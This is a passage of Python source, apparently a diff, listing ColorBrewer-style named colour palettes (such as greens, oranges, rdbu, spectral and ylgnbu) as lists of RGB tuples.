1, 107)], - 'bupu9': [(247, 252, 253), (224, 236, 244), (191, 211, 230), (158, 188, 218), (140, 150, 198), (140, 107, 177), (136, 65, 157), (129, 15, 124), (77, 0, 75)], - 'dark23': [(27, 158, 119), (217, 95, 2), (117, 112, 179)], - 'dark24': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138)], - 'dark25': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138), (102, 166, 30)], - 'dark26': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138), (102, 166, 30), (230, 171, 2)], - 'dark27': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138), (102, 166, 30), (230, 171, 2), (166, 118, 29)], - 'dark28': [(27, 158, 119), (217, 95, 2), (117, 112, 179), (231, 41, 138), (102, 166, 30), (230, 171, 2), (166, 118, 29), (102, 102, 102)], - 'gnbu3': [(224, 243, 219), (168, 221, 181), (67, 162, 202)], - 'gnbu4': [(240, 249, 232), (186, 228, 188), (123, 204, 196), (43, 140, 190)], - 'gnbu5': [(240, 249, 232), (186, 228, 188), (123, 204, 196), (67, 162, 202), (8, 104, 172)], - 'gnbu6': [(240, 249, 232), (204, 235, 197), (168, 221, 181), (123, 204, 196), (67, 162, 202), (8, 104, 172)], - 'gnbu7': [(240, 249, 232), (204, 235, 197), (168, 221, 181), (123, 204, 196), (78, 179, 211), (43, 140, 190), (8, 88, 158)], - 'gnbu8': [(247, 252, 240), (224, 243, 219), (204, 235, 197), (168, 221, 181), (123, 204, 196), (78, 179, 211), (43, 140, 190), (8, 88, 158)], - 'gnbu9': [(247, 252, 240), (224, 243, 219), (204, 235, 197), (168, 221, 181), (123, 204, 196), (78, 179, 211), (43, 140, 190), (8, 104, 172), (8, 64, 129)], - 'greens3': [(229, 245, 224), (161, 217, 155), (49, 163, 84)], - 'greens4': [(237, 248, 233), (186, 228, 179), (116, 196, 118), (35, 139, 69)], - 'greens5': [(237, 248, 233), (186, 228, 179), (116, 196, 118), (49, 163, 84), (0, 109, 44)], - 'greens6': [(237, 248, 233), (199, 233, 192), (161, 217, 155), (116, 196, 118), (49, 163, 84), (0, 109, 44)], - 'greens7': [(237, 248, 233), (199, 233, 192), (161, 217, 155), (116, 196, 118), (65, 171, 93), (35, 139, 69), (0, 90, 50)], - 'greens8': [(247, 252, 245), (229, 245, 224), (199, 233, 192), (161, 217, 155), (116, 196, 118), (65, 171, 93), (35, 139, 69), (0, 90, 50)], - 'greens9': [(247, 252, 245), (229, 245, 224), (199, 233, 192), (161, 217, 155), (116, 196, 118), (65, 171, 93), (35, 139, 69), (0, 109, 44), (0, 68, 27)], - 'greys3': [(240, 240, 240), (189, 189, 189), (99, 99, 99)], - 'greys4': [(247, 247, 247), (204, 204, 204), (150, 150, 150), (82, 82, 82)], - 'greys5': [(247, 247, 247), (204, 204, 204), (150, 150, 150), (99, 99, 99), (37, 37, 37)], - 'greys6': [(247, 247, 247), (217, 217, 217), (189, 189, 189), (150, 150, 150), (99, 99, 99), (37, 37, 37)], - 'greys7': [(247, 247, 247), (217, 217, 217), (189, 189, 189), (150, 150, 150), (115, 115, 115), (82, 82, 82), (37, 37, 37)], - 'greys8': [(255, 255, 255), (240, 240, 240), (217, 217, 217), (189, 189, 189), (150, 150, 150), (115, 115, 115), (82, 82, 82), (37, 37, 37)], - 'greys9': [(255, 255, 255), (240, 240, 240), (217, 217, 217), (189, 189, 189), (150, 150, 150), (115, 115, 115), (82, 82, 82), (37, 37, 37), (0, 0, 0)], - 'oranges3': [(254, 230, 206), (253, 174, 107), (230, 85, 13)], - 'oranges4': [(254, 237, 222), (253, 190, 133), (253, 141, 60), (217, 71, 1)], - 'oranges5': [(254, 237, 222), (253, 190, 133), (253, 141, 60), (230, 85, 13), (166, 54, 3)], - 'oranges6': [(254, 237, 222), (253, 208, 162), (253, 174, 107), (253, 141, 60), (230, 85, 13), (166, 54, 3)], - 'oranges7': [(254, 237, 222), (253, 208, 162), (253, 174, 107), (253, 141, 60), (241, 105, 19), (217, 72, 1), (140, 45, 4)], - 'oranges8': [(255, 245, 235), (254, 230, 206), (253, 208, 162), (253, 174, 107), (253, 141, 60), (241, 105, 19), (217, 72, 1), (140, 45, 4)], - 'oranges9': [(255, 245, 235), (254, 230, 206), (253, 208, 162), (253, 174, 107), (253, 141, 60), (241, 105, 19), (217, 72, 1), (166, 54, 3), (127, 39, 4)], - 'orrd3': [(254, 232, 200), (253, 187, 132), (227, 74, 51)], - 'orrd4': [(254, 240, 217), (253, 204, 138), (252, 141, 89), (215, 48, 31)], - 'orrd5': [(254, 240, 217), (253, 204, 138), (252, 141, 89), (227, 74, 51), (179, 0, 0)], - 'orrd6': [(254, 240, 217), (253, 212, 158), (253, 187, 132), (252, 141, 89), (227, 74, 51), (179, 0, 0)], - 'orrd7': [(254, 240, 217), (253, 212, 158), (253, 187, 132), (252, 141, 89), (239, 101, 72), (215, 48, 31), (153, 0, 0)], - 'orrd8': [(255, 247, 236), (254, 232, 200), (253, 212, 158), (253, 187, 132), (252, 141, 89), (239, 101, 72), (215, 48, 31), (153, 0, 0)], - 'orrd9': [(255, 247, 236), (254, 232, 200), (253, 212, 158), (253, 187, 132), (252, 141, 89), (239, 101, 72), (215, 48, 31), (179, 0, 0), (127, 0, 0)], - 'paired10': [(166, 206, 227), (106, 61, 154), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0), (202, 178, 214)], - 'paired11': [(166, 206, 227), (106, 61, 154), (255, 255, 153), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0), (202, 178, 214)], - 'paired12': [(166, 206, 227), (106, 61, 154), (255, 255, 153), (177, 89, 40), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0), (202, 178, 214)], - 'paired3': [(166, 206, 227), (31, 120, 180), (178, 223, 138)], - 'paired4': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44)], - 'paired5': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153)], - 'paired6': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28)], - 'paired7': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111)], - 'paired8': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0)], - 'paired9': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0), (202, 178, 214)], - 'pastel13': [(251, 180, 174), (179, 205, 227), (204, 235, 197)], - 'pastel14': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228)], - 'pastel15': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166)], - 'pastel16': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166), (255, 255, 204)], - 'pastel17': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166), (255, 255, 204), (229, 216, 189)], - 'pastel18': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166), (255, 255, 204), (229, 216, 189), (253, 218, 236)], - 'pastel19': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166), (255, 255, 204), (229, 216, 189), (253, 218, 236), (242, 242, 242)], - 'pastel23': [(179, 226, 205), (253, 205, 172), (203, 213, 232)], - 'pastel24': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228)], - 'pastel25': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228), (230, 245, 201)], - 'pastel26': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228), (230, 245, 201), (255, 242, 174)], - 'pastel27': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228), (230, 245, 201), (255, 242, 174), (241, 226, 204)], - 'pastel28': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228), (230, 245, 201), (255, 242, 174), (241, 226, 204), (204, 204, 204)], - 'piyg10': [(142, 1, 82), (39, 100, 25), (197, 27, 125), (222, 119, 174), (241, 182, 218), (253, 224, 239), (230, 245, 208), (184, 225, 134), (127, 188, 65), (77, 146, 33)], - 'piyg11': [(142, 1, 82), (77, 146, 33), (39, 100, 25), (197, 27, 125), (222, 119, 174), (241, 182, 218), (253, 224, 239), (247, 247, 247), (230, 245, 208), (184, 225, 134), (127, 188, 65)], - 'piyg3': [(233, 163, 201), (247, 247, 247), (161, 215, 106)], - 'piyg4': [(208, 28, 139), (241, 182, 218), (184, 225, 134), (77, 172, 38)], - 'piyg5': [(208, 28, 139), (241, 182, 218), (247, 247, 247), (184, 225, 134), (77, 172, 38)], - 'piyg6': [(197, 27, 125), (233, 163, 201), (253, 224, 239), (230, 245, 208), (161, 215, 106), (77, 146, 33)], - 'piyg7': [(197, 27, 125), (233, 163, 201), (253, 224, 239), (247, 247, 247), (230, 245, 208), (161, 215, 106), (77, 146, 33)], - 'piyg8': [(197, 27, 125), (222, 119, 174), (241, 182, 218), (253, 224, 239), (230, 245, 208), (184, 225, 134), (127, 188, 65), (77, 146, 33)], - 'piyg9': [(197, 27, 125), (222, 119, 174), (241, 182, 218), (253, 224, 239), (247, 247, 247), (230, 245, 208), (184, 225, 134), (127, 188, 65), (77, 146, 33)], - 'prgn10': [(64, 0, 75), (0, 68, 27), (118, 42, 131), (153, 112, 171), (194, 165, 207), (231, 212, 232), (217, 240, 211), (166, 219, 160), (90, 174, 97), (27, 120, 55)], - 'prgn11': [(64, 0, 75), (27, 120, 55), (0, 68, 27), (118, 42, 131), (153, 112, 171), (194, 165, 207), (231, 212, 232), (247, 247, 247), (217, 240, 211), (166, 219, 160), (90, 174, 97)], - 'prgn3': [(175, 141, 195), (247, 247, 247), (127, 191, 123)], - 'prgn4': [(123, 50, 148), (194, 165, 207), (166, 219, 160), (0, 136, 55)], - 'prgn5': [(123, 50, 148), (194, 165, 207), (247, 247, 247), (166, 219, 160), (0, 136, 55)], - 'prgn6': [(118, 42, 131), (175, 141, 195), (231, 212, 232), (217, 240, 211), (127, 191, 123), (27, 120, 55)], - 'prgn7': [(118, 42, 131), (175, 141, 195), (231, 212, 232), (247, 247, 247), (217, 240, 211), (127, 191, 123), (27, 120, 55)], - 'prgn8': [(118, 42, 131), (153, 112, 171), (194, 165, 207), (231, 212, 232), (217, 240, 211), (166, 219, 160), (90, 174, 97), (27, 120, 55)], - 'prgn9': [(118, 42, 131), (153, 112, 171), (194, 165, 207), (231, 212, 232), (247, 247, 247), (217, 240, 211), (166, 219, 160), (90, 174, 97), (27, 120, 55)], - 'pubu3': [(236, 231, 242), (166, 189, 219), (43, 140, 190)], - 'pubu4': [(241, 238, 246), (189, 201, 225), (116, 169, 207), (5, 112, 176)], - 'pubu5': [(241, 238, 246), (189, 201, 225), (116, 169, 207), (43, 140, 190), (4, 90, 141)], - 'pubu6': [(241, 238, 246), (208, 209, 230), (166, 189, 219), (116, 169, 207), (43, 140, 190), (4, 90, 141)], - 'pubu7': [(241, 238, 246), (208, 209, 230), (166, 189, 219), (116, 169, 207), (54, 144, 192), (5, 112, 176), (3, 78, 123)], - 'pubu8': [(255, 247, 251), (236, 231, 242), (208, 209, 230), (166, 189, 219), (116, 169, 207), (54, 144, 192), (5, 112, 176), (3, 78, 123)], - 'pubu9': [(255, 247, 251), (236, 231, 242), (208, 209, 230), (166, 189, 219), (116, 169, 207), (54, 144, 192), (5, 112, 176), (4, 90, 141), (2, 56, 88)], - 'pubugn3': [(236, 226, 240), (166, 189, 219), (28, 144, 153)], - 'pubugn4': [(246, 239, 247), (189, 201, 225), (103, 169, 207), (2, 129, 138)], - 'pubugn5': [(246, 239, 247), (189, 201, 225), (103, 169, 207), (28, 144, 153), (1, 108, 89)], - 'pubugn6': [(246, 239, 247), (208, 209, 230), (166, 189, 219), (103, 169, 207), (28, 144, 153), (1, 108, 89)], - 'pubugn7': [(246, 239, 247), (208, 209, 230), (166, 189, 219), (103, 169, 207), (54, 144, 192), (2, 129, 138), (1, 100, 80)], - 'pubugn8': [(255, 247, 251), (236, 226, 240), (208, 209, 230), (166, 189, 219), (103, 169, 207), (54, 144, 192), (2, 129, 138), (1, 100, 80)], - 'pubugn9': [(255, 247, 251), (236, 226, 240), (208, 209, 230), (166, 189, 219), (103, 169, 207), (54, 144, 192), (2, 129, 138), (1, 108, 89), (1, 70, 54)], - 'puor10': [(127, 59, 8), (45, 0, 75), (179, 88, 6), (224, 130, 20), (253, 184, 99), (254, 224, 182), (216, 218, 235), (178, 171, 210), (128, 115, 172), (84, 39, 136)], - 'puor11': [(127, 59, 8), (84, 39, 136), (45, 0, 75), (179, 88, 6), (224, 130, 20), (253, 184, 99), (254, 224, 182), (247, 247, 247), (216, 218, 235), (178, 171, 210), (128, 115, 172)], - 'puor3': [(241, 163, 64), (247, 247, 247), (153, 142, 195)], - 'puor4': [(230, 97, 1), (253, 184, 99), (178, 171, 210), (94, 60, 153)], - 'puor5': [(230, 97, 1), (253, 184, 99), (247, 247, 247), (178, 171, 210), (94, 60, 153)], - 'puor6': [(179, 88, 6), (241, 163, 64), (254, 224, 182), (216, 218, 235), (153, 142, 195), (84, 39, 136)], - 'puor7': [(179, 88, 6), (241, 163, 64), (254, 224, 182), (247, 247, 247), (216, 218, 235), (153, 142, 195), (84, 39, 136)], - 'puor8': [(179, 88, 6), (224, 130, 20), (253, 184, 99), (254, 224, 182), (216, 218, 235), (178, 171, 210), (128, 115, 172), (84, 39, 136)], - 'puor9': [(179, 88, 6), (224, 130, 20), (253, 184, 99), (254, 224, 182), (247, 247, 247), (216, 218, 235), (178, 171, 210), (128, 115, 172), (84, 39, 136)], - 'purd3': [(231, 225, 239), (201, 148, 199), (221, 28, 119)], - 'purd4': [(241, 238, 246), (215, 181, 216), (223, 101, 176), (206, 18, 86)], - 'purd5': [(241, 238, 246), (215, 181, 216), (223, 101, 176), (221, 28, 119), (152, 0, 67)], - 'purd6': [(241, 238, 246), (212, 185, 218), (201, 148, 199), (223, 101, 176), (221, 28, 119), (152, 0, 67)], - 'purd7': [(241, 238, 246), (212, 185, 218), (201, 148, 199), (223, 101, 176), (231, 41, 138), (206, 18, 86), (145, 0, 63)], - 'purd8': [(247, 244, 249), (231, 225, 239), (212, 185, 218), (201, 148, 199), (223, 101, 176), (231, 41, 138), (206, 18, 86), (145, 0, 63)], - 'purd9': [(247, 244, 249), (231, 225, 239), (212, 185, 218), (201, 148, 199), (223, 101, 176), (231, 41, 138), (206, 18, 86), (152, 0, 67), (103, 0, 31)], - 'purples3': [(239, 237, 245), (188, 189, 220), (117, 107, 177)], - 'purples4': [(242, 240, 247), (203, 201, 226), (158, 154, 200), (106, 81, 163)], - 'purples5': [(242, 240, 247), (203, 201, 226), (158, 154, 200), (117, 107, 177), (84, 39, 143)], - 'purples6': [(242, 240, 247), (218, 218, 235), (188, 189, 220), (158, 154, 200), (117, 107, 177), (84, 39, 143)], - 'purples7': [(242, 240, 247), (218, 218, 235), (188, 189, 220), (158, 154, 200), (128, 125, 186), (106, 81, 163), (74, 20, 134)], - 'purples8': [(252, 251, 253), (239, 237, 245), (218, 218, 235), (188, 189, 220), (158, 154, 200), (128, 125, 186), (106, 81, 163), (74, 20, 134)], - 'purples9': [(252, 251, 253), (239, 237, 245), (218, 218, 235), (188, 189, 220), (158, 154, 200), (128, 125, 186), (106, 81, 163), (84, 39, 143), (63, 0, 125)], - 'rdbu10': [(103, 0, 31), (5, 48, 97), (178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (209, 229, 240), (146, 197, 222), (67, 147, 195), (33, 102, 172)], - 'rdbu11': [(103, 0, 31), (33, 102, 172), (5, 48, 97), (178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (247, 247, 247), (209, 229, 240), (146, 197, 222), (67, 147, 195)], - 'rdbu3': [(239, 138, 98), (247, 247, 247), (103, 169, 207)], - 'rdbu4': [(202, 0, 32), (244, 165, 130), (146, 197, 222), (5, 113, 176)], - 'rdbu5': [(202, 0, 32), (244, 165, 130), (247, 247, 247), (146, 197, 222), (5, 113, 176)], - 'rdbu6': [(178, 24, 43), (239, 138, 98), (253, 219, 199), (209, 229, 240), (103, 169, 207), (33, 102, 172)], - 'rdbu7': [(178, 24, 43), (239, 138, 98), (253, 219, 199), (247, 247, 247), (209, 229, 240), (103, 169, 207), (33, 102, 172)], - 'rdbu8': [(178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (209, 229, 240), (146, 197, 222), (67, 147, 195), (33, 102, 172)], - 'rdbu9': [(178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (247, 247, 247), (209, 229, 240), (146, 197, 222), (67, 147, 195), (33, 102, 172)], - 'rdgy10': [(103, 0, 31), (26, 26, 26), (178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (224, 224, 224), (186, 186, 186), (135, 135, 135), (77, 77, 77)], - 'rdgy11': [(103, 0, 31), (77, 77, 77), (26, 26, 26), (178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (255, 255, 255), (224, 224, 224), (186, 186, 186), (135, 135, 135)], - 'rdgy3': [(239, 138, 98), (255, 255, 255), (153, 153, 153)], - 'rdgy4': [(202, 0, 32), (244, 165, 130), (186, 186, 186), (64, 64, 64)], - 'rdgy5': [(202, 0, 32), (244, 165, 130), (255, 255, 255), (186, 186, 186), (64, 64, 64)], - 'rdgy6': [(178, 24, 43), (239, 138, 98), (253, 219, 199), (224, 224, 224), (153, 153, 153), (77, 77, 77)], - 'rdgy7': [(178, 24, 43), (239, 138, 98), (253, 219, 199), (255, 255, 255), (224, 224, 224), (153, 153, 153), (77, 77, 77)], - 'rdgy8': [(178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (224, 224, 224), (186, 186, 186), (135, 135, 135), (77, 77, 77)], - 'rdgy9': [(178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (255, 255, 255), (224, 224, 224), (186, 186, 186), (135, 135, 135), (77, 77, 77)], - 'rdpu3': [(253, 224, 221), (250, 159, 181), (197, 27, 138)], - 'rdpu4': [(254, 235, 226), (251, 180, 185), (247, 104, 161), (174, 1, 126)], - 'rdpu5': [(254, 235, 226), (251, 180, 185), (247, 104, 161), (197, 27, 138), (122, 1, 119)], - 'rdpu6': [(254, 235, 226), (252, 197, 192), (250, 159, 181), (247, 104, 161), (197, 27, 138), (122, 1, 119)], - 'rdpu7': [(254, 235, 226), (252, 197, 192), (250, 159, 181), (247, 104, 161), (221, 52, 151), (174, 1, 126), (122, 1, 119)], - 'rdpu8': [(255, 247, 243), (253, 224, 221), (252, 197, 192), (250, 159, 181), (247, 104, 161), (221, 52, 151), (174, 1, 126), (122, 1, 119)], - 'rdpu9': [(255, 247, 243), (253, 224, 221), (252, 197, 192), (250, 159, 181), (247, 104, 161), (221, 52, 151), (174, 1, 126), (122, 1, 119), (73, 0, 106)], - 'rdylbu10': [(165, 0, 38), (49, 54, 149), (215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 144), (224, 243, 248), (171, 217, 233), (116, 173, 209), (69, 117, 180)], - 'rdylbu11': [(165, 0, 38), (69, 117, 180), (49, 54, 149), (215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 144), (255, 255, 191), (224, 243, 248), (171, 217, 233), (116, 173, 209)], - 'rdylbu3': [(252, 141, 89), (255, 255, 191), (145, 191, 219)], - 'rdylbu4': [(215, 25, 28), (253, 174, 97), (171, 217, 233), (44, 123, 182)], - 'rdylbu5': [(215, 25, 28), (253, 174, 97), (255, 255, 191), (171, 217, 233), (44, 123, 182)], - 'rdylbu6': [(215, 48, 39), (252, 141, 89), (254, 224, 144), (224, 243, 248), (145, 191, 219), (69, 117, 180)], - 'rdylbu7': [(215, 48, 39), (252, 141, 89), (254, 224, 144), (255, 255, 191), (224, 243, 248), (145, 191, 219), (69, 117, 180)], - 'rdylbu8': [(215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 144), (224, 243, 248), (171, 217, 233), (116, 173, 209), (69, 117, 180)], - 'rdylbu9': [(215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 144), (255, 255, 191), (224, 243, 248), (171, 217, 233), (116, 173, 209), (69, 117, 180)], - 'rdylgn10': [(165, 0, 38), (0, 104, 55), (215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 139), (217, 239, 139), (166, 217, 106), (102, 189, 99), (26, 152, 80)], - 'rdylgn11': [(165, 0, 38), (26, 152, 80), (0, 104, 55), (215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 139), (255, 255, 191), (217, 239, 139), (166, 217, 106), (102, 189, 99)], - 'rdylgn3': [(252, 141, 89), (255, 255, 191), (145, 207, 96)], - 'rdylgn4': [(215, 25, 28), (253, 174, 97), (166, 217, 106), (26, 150, 65)], - 'rdylgn5': [(215, 25, 28), (253, 174, 97), (255, 255, 191), (166, 217, 106), (26, 150, 65)], - 'rdylgn6': [(215, 48, 39), (252, 141, 89), (254, 224, 139), (217, 239, 139), (145, 207, 96), (26, 152, 80)], - 'rdylgn7': [(215, 48, 39), (252, 141, 89), (254, 224, 139), (255, 255, 191), (217, 239, 139), (145, 207, 96), (26, 152, 80)], - 'rdylgn8': [(215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 139), (217, 239, 139), (166, 217, 106), (102, 189, 99), (26, 152, 80)], - 'rdylgn9': [(215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 139), (255, 255, 191), (217, 239, 139), (166, 217, 106), (102, 189, 99), (26, 152, 80)], - 'reds3': [(254, 224, 210), (252, 146, 114), (222, 45, 38)], - 'reds4': [(254, 229, 217), (252, 174, 145), (251, 106, 74), (203, 24, 29)], - 'reds5': [(254, 229, 217), (252, 174, 145), (251, 106, 74), (222, 45, 38), (165, 15, 21)], - 'reds6': [(254, 229, 217), (252, 187, 161), (252, 146, 114), (251, 106, 74), (222, 45, 38), (165, 15, 21)], - 'reds7': [(254, 229, 217), (252, 187, 161), (252, 146, 114), (251, 106, 74), (239, 59, 44), (203, 24, 29), (153, 0, 13)], - 'reds8': [(255, 245, 240), (254, 224, 210), (252, 187, 161), (252, 146, 114), (251, 106, 74), (239, 59, 44), (203, 24, 29), (153, 0, 13)], - 'reds9': [(255, 245, 240), (254, 224, 210), (252, 187, 161), (252, 146, 114), (251, 106, 74), (239, 59, 44), (203, 24, 29), (165, 15, 21), (103, 0, 13)], - 'set13': [(228, 26, 28), (55, 126, 184), (77, 175, 74)], - 'set14': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163)], - 'set15': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0)], - 'set16': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0), (255, 255, 51)], - 'set17': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0), (255, 255, 51), (166, 86, 40)], - 'set18': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0), (255, 255, 51), (166, 86, 40), (247, 129, 191)], - 'set19': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0), (255, 255, 51), (166, 86, 40), (247, 129, 191), (153, 153, 153)], - 'set23': [(102, 194, 165), (252, 141, 98), (141, 160, 203)], - 'set24': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195)], - 'set25': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195), (166, 216, 84)], - 'set26': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195), (166, 216, 84), (255, 217, 47)], - 'set27': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195), (166, 216, 84), (255, 217, 47), (229, 196, 148)], - 'set28': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195), (166, 216, 84), (255, 217, 47), (229, 196, 148), (179, 179, 179)], - 'set310': [(141, 211, 199), (188, 128, 189), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229), (217, 217, 217)], - 'set311': [(141, 211, 199), (188, 128, 189), (204, 235, 197), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229), (217, 217, 217)], - 'set312': [(141, 211, 199), (188, 128, 189), (204, 235, 197), (255, 237, 111), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229), (217, 217, 217)], - 'set33': [(141, 211, 199), (255, 255, 179), (190, 186, 218)], - 'set34': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114)], - 'set35': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211)], - 'set36': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98)], - 'set37': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105)], - 'set38': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229)], - 'set39': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229), (217, 217, 217)], - 'spectral10': [(158, 1, 66), (94, 79, 162), (213, 62, 79), (244, 109, 67), (253, 174, 97), (254, 224, 139), (230, 245, 152), (171, 221, 164), (102, 194, 165), (50, 136, 189)], - 'spectral11': [(158, 1, 66), (50, 136, 189), (94, 79, 162), (213, 62, 79), (244, 109, 67), (253, 174, 97), (254, 224, 139), (255, 255, 191), (230, 245, 152), (171, 221, 164), (102, 194, 165)], - 'spectral3': [(252, 141, 89), (255, 255, 191), (153, 213, 148)], - 'spectral4': [(215, 25, 28), (253, 174, 97), (171, 221, 164), (43, 131, 186)], - 'spectral5': [(215, 25, 28), (253, 174, 97), (255, 255, 191), (171, 221, 164), (43, 131, 186)], - 'spectral6': [(213, 62, 79), (252, 141, 89), (254, 224, 139), (230, 245, 152), (153, 213, 148), (50, 136, 189)], - 'spectral7': [(213, 62, 79), (252, 141, 89), (254, 224, 139), (255, 255, 191), (230, 245, 152), (153, 213, 148), (50, 136, 189)], - 'spectral8': [(213, 62, 79), (244, 109, 67), (253, 174, 97), (254, 224, 139), (230, 245, 152), (171, 221, 164), (102, 194, 165), (50, 136, 189)], - 'spectral9': [(213, 62, 79), (244, 109, 67), (253, 174, 97), (254, 224, 139), (255, 255, 191), (230, 245, 152), (171, 221, 164), (102, 194, 165), (50, 136, 189)], - 'ylgn3': [(247, 252, 185), (173, 221, 142), (49, 163, 84)], - 'ylgn4': [(255, 255, 204), (194, 230, 153), (120, 198, 121), (35, 132, 67)], - 'ylgn5': [(255, 255, 204), (194, 230, 153), (120, 198, 121), (49, 163, 84), (0, 104, 55)], - 'ylgn6': [(255, 255, 204), (217, 240, 163), (173, 221, 142), (120, 198, 121), (49, 163, 84), (0, 104, 55)], - 'ylgn7': [(255, 255, 204), (217, 240, 163), (173, 221, 142), (120, 198, 121), (65, 171, 93), (35, 132, 67), (0, 90, 50)], - 'ylgn8': [(255, 255, 229), (247, 252, 185), (217, 240, 163), (173, 221, 142), (120, 198, 121), (65, 171, 93), (35, 132, 67), (0, 90, 50)], - 'ylgn9': [(255, 255, 229), (247, 252, 185), (217, 240, 163), (173, 221, 142), (120, 198, 121), (65, 171, 93), (35, 132, 67), (0, 104, 55), (0, 69, 41)], - 'ylgnbu3': [(237, 248, 177), (127, 205, 187), (44, 127, 184)], - 'ylgnbu4': [(255, 255, 204), (161, 218, 180), (65, 182, 196), (34, 94, 168)], - 'ylgnbu5': [(255, 255, 204), (161, 218, 180), (65, 182, 196), (44, 127, 184), (37, 52, 148)], - 'ylgnbu6': [(255, 255, 204), (199, 233, 180), (127, 205, 187), (65, 182, 196), (44, 127, 184), (37, 52, 148)], - 'ylgnbu7': [(255, 255, 204), (199, 233, 180), (127, 205, 187), (65, 182, 196), (29, 145, 192), (34, 94, 168), (12, 44, 132)], - 'ylgnbu8': [(255, 255, 217), (237, 248, 177), (199, 233, 180), (127, 205, 187), (65, 182, 196), (29, 145, 192), (34, 94, 168), (12, 44, 132)], - 'ylgnbu9': [(255, 255, 217), (237, 248, 177), (199, 233, 180), (127, 205, 187), (65, 182, 196), (29, 145, 192), (34, 94, 168), (37, 52, 148), (8, 29, 88)], - 'ylorbr3': [(255, 247, 188), (254, 196, 79), (217, 95, 14)], - 'ylorbr4': [(255, 255, 212), (254, 217, 142), (254, 153, 41), (204, 76, 2)], - 'ylorbr5': [(255, 255, 212), (254, 217, 142), (254, 153, 41), (217, 95, 14), (153, 52, 4)], - 'ylorbr6': [(255, 255, 212), (254, 227, 145), (254, 196, 79), (254, 153, 41), (217, 95, 14), (153, 52, 4)], - 'ylorbr7': [(255, 255, 212), (254, 227, 145), (254, 196, 79), (254, 153, 41), (236, 112, 20), (204, 76, 2), (140, 45, 4)], - 'ylorbr8': [(255, 255, 229), (255, 